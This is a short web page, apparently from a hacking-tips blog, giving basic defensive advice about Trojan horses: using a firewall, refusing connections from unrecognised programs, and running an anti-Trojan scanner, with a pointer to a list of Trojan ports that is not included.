Installing a firewall (a program which filters data entering and leaving your machine) is enough to protect you from this kind of intrusion. A firewall monitors both data leaving your machine (normally initiated by the programs you are using) and data entering it. However, the firewall may detect unknown outside connections even if a hacker is not specifically targeting you.. They may be tests carried out by your Internet service provider, or a hacker randomly scanning a range of IP addresses.


 


For Windows systems, there are two free high-performance firewalls:







In case of infection


If a program whose origins you are unsure of attempts to open a connection, the firewall will ask you to confirm it before initiating the connection. It is important to not authorise connections for a program you don't recognise, because it might very well be a Trojan horse.


If this reoccurs, it may be helpful to check that your computer isn't affected by a Trojan, by using a program that detects and deletes them (called an anti-Trojan).


One example is The Cleaner, which can be downloaded from http://www.moosoft.com.



List of ports commonly used by Trojans


Trojan horses commonly open a port on the infected machine and wait for a connection to open on that port, so that hackers will be able to gain total control over the computer. The article:
Ports used by Trojans
is a (non exhaustive) list of the most common ports used by Trojan horses (source: Site de Rico)

 



Enjoy HaCkInG.....

 

ads

New Tricks Via mail

Enter your email address: